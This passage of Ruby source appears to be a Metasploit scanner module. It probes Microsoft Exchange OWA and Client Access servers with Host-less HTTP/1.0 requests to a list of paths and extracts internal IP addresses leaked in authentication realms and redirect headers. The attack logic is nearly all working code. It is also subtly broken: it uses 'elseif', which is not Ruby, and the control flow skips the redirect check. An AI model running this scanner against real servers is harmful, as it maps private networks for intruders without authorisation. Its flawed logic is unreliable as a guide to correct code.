def initialize
super(
'Name' => 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
'Description' => %q{
This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 2013 servers.
},
'Author' =>
[
'Nate Power'
],
'DisclosureDate' => 'Aug 01 2014',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'SSL' => true
}
)
register_options(
[
OptInt.new('TIMEOUT', [ true, "HTTP connection timeout", 10]),
OptInt.new('RPORT', [ true, "The target port", 443]),
], self.class)
end
def run_host(target_host)
rhost = target_host
print_status("#{msg} Checking HTTP headers")
get_ip_extract
end
def get_ip_extract
urls = ["/Microsoft-Server-ActiveSync/default.eas",
"/Microsoft-Server-ActiveSync",
"/Autodiscover/Autodiscover.xml",
"/Autodiscover",
"/Exchange",
"/Rpc",
"/EWS/Exchange.asmx",
"/EWS/Services.wsdl",
"/EWS",
"/ecp",
"/OAB",
"/OWA",
"/aspnet_client",
"/PowerShell"]
result = nil
urls.each do |url|
begin
res = send_request_cgi({
'version' => "1.0",
'uri' => "#{url}",
'method' => 'GET',
'vhost' => ''
}, timeout = datastore['TIMEOUT'])
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
print_error("#{msg} HTTP Connection Failed")
next
end
if not res
print_error("#{msg} HTTP Connection Timeout")
next
end
if res and res.code == 401 and (match = res['WWW-Authenticate'].match(/Basic realm=\"(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\"/i))
result = match.captures[0]
print_status("#{msg} Status Code: 401 response")
print_status("#{msg} Found Path: " + url )
print_good("#{msg} Found target internal IP address: " + result)
return result
elseif
print_warning("#{msg} No internal address found")
next
end
if res and (res.code > 300 and res.code < 310) and (match = res['Location'].match(/^http[s]:\/\/(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\//i))
result = match.captures[0]
print_status("#{msg} Status Code: #{res.code} response")
print_status("#{msg} Found Path: " + url )
print_good("#{msg} Found target internal IP address: " + result)
return result
elseif
print_warning("#{msg} No internal address found")
next
end
end
if result.nil?
print_warning("#{msg} Nothing found")
end
return result
end
def msg
"#{rhost}:#{rport} -"
end
end